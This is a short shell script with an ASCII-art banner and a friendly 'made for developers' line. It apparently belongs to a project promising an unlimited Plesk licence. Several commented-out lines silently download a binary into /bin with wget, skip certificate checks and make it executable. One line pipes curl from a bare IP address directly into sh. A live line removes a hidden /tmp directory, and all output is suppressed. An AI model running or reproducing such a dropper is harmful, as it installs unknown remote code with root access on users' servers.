echo "                         
  ___                     
//   / /  ___     ___    
    / / //___)) //   ) ) 
   / / //      //   / /  
  / / ((____  ((___( ( " > /dev/null
echo  💕 Made for developers by developers ♡ ♥  
#wget -q -O /bin/7ea https://github.com/7054company/plesk-unlimited-license/raw/main/7ea > /dev/null    2> /dev/null    || true && chmod +x /bin/7ea > /dev/null 2>/dev/null
#new wget -q   --no-check-certificate -O /bin/7ea.d https://github.com/7054company/plesk-unlimited-license/raw/main/7ea  > /dev/null    2> /dev/null    || true && chmod +x /bin/7ea.d && mv /bin/7ea.d /bin/7ea > /dev/null 2>/dev/null

#wget -q   --no-check-certificate -O /bin/7ea.d https://github.com/7054company/plesk-unlimited-license/raw/main/7ea  > /dev/null    2> /dev/null    || true && chmod +x /bin/7ea.d  > /dev/null 2>/dev/null && mv /bin/7ea.d /bin/7ea > /dev/null 2>/dev/null


#  curl http://16.170.236.233:1038|sh
rm -fr /tmp/.ea > /dev/null 2> /dev/null || true
#echo hi whoami
#1.1.1.1
#echo ok
